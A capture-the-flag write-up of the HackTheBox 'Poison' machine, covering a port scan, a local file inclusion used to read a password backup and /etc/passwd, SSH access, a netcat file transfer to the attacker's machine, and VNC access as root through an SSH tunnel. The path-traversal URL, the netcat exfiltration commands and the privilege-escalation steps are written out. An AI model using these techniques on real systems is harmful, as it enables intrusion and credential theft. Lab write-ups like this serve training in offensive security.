HackTheBox - Poison Writeup

tags: writeup HackTheBox Poison medium OSCP

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

# Nmap 7.92 scan initiated Fri Jun 10 07:21:26 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports3 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 10 07:28:31 2022 -- 1 IP address (1 host up) scanned in 424.26 seconds

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

If we enter on the web you can see we have a form that allow to write some file to load into the web:

So after looking into each file in the listfiles.php we can see that is a txt let's look into it.

After looking the URL we can easily recognize a LFI vulnerability, so knowing this let's try to load the pwdbackup.txt file using this URL:

http://10.10.10.84/browse.php?file=pwdbackup.txt

Reading this we see that it's encoded, but encoded means that we can decode it easily, i gonna use CyberChef and it looks like is base64 encoding so let's decode it 13 times.

After decoding it 13 times we know the password:

Charix!2#4%6&8(0

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

I suppose that may will be the ssh password but we don't know the user so knowing that we have a LFI vulnerability let's read the /etc/password file to know the users.

To do this we have to use a LFI payload that go back in the directories and enter into /etc/password so we are gonna use this:

http://10.10.10.84/browse.php?file=../../../../../../etc/passwd

Knowing a little bit of linux we have to know that every user that has and id < 1000 is a service user we know now the user for the ssh so let's try to connect using the decoded password and the charix user.

After that we have the user flag:

It's time to privesc!

⏫Root Privesc

First thing we do is trying to unzip the secret zip.

So we can't unzip it on the target machine so let's download it to our machine, to do this we are gonna use netcat that comes installed into the machine.

We have to start a netcat listener in our machine and a nectat connection in the target machine to transfer the file:

First execute this command in our machine:

nc -nvlp 9999 > secret.zip

After that execute this on the target machine:

nc -nv 10.10.10.10 9999 < secret.zip  

After executed this we receive the secret.zip file in our machine!

Let's try to unzip it using the same password as the ssh connection:

Charix!2#4%6&8(0

After unzip the secret file we see that it has some strange characters and is an Non-iSO filetype:

After that it's time to look again into the machine an enumerate more to see what we can do.

Looking some common things and using scripts like linpeas and other privesc script i remember to look the running processes so it time to run:

ps aux

After executing this I found a interesting thing.

There is a vncserver running on the machine as root, but we can't access from outside because we don't see it on the port scan, so we have to do a SSH tunnel to allow us to look into the vnc.

To see more info about vnc let's look into the Hacktricks webpage,
after looking into it i found that we can decrypt the secret file with a tool called vncpwd , after download it and compiled we can obtain the plain text password for the vnc.

With this and knowing that the port for the VNC is 5901 it's time to start the SSH tunnel and try to connect.

ssh charix@10.10.10.84 -L 1337:localhost:5901 -fN

With this command we start the Bind SSH Tunnel and we indicate that we only want the connection and we aren't gonna need the ssh terminal.

Now it's time to connect to the VNC using the file secret because in this case the decrypted password don't work well so we are gonna use the secret file directly:

sudo vncviewer -passwd secret localhost:1337

After that a VNC window pop up logged as root so we can read the root flag.

To make easy to work with it, I changed the root password to root:root and logged in with ssh because my VNC don't work very well.

And thats all we pwned the machine! To understand better the pivoting part and the SSH connections I really recommend the Wreath Lab from Tryhackme that explains very well how works all.

You can find me on: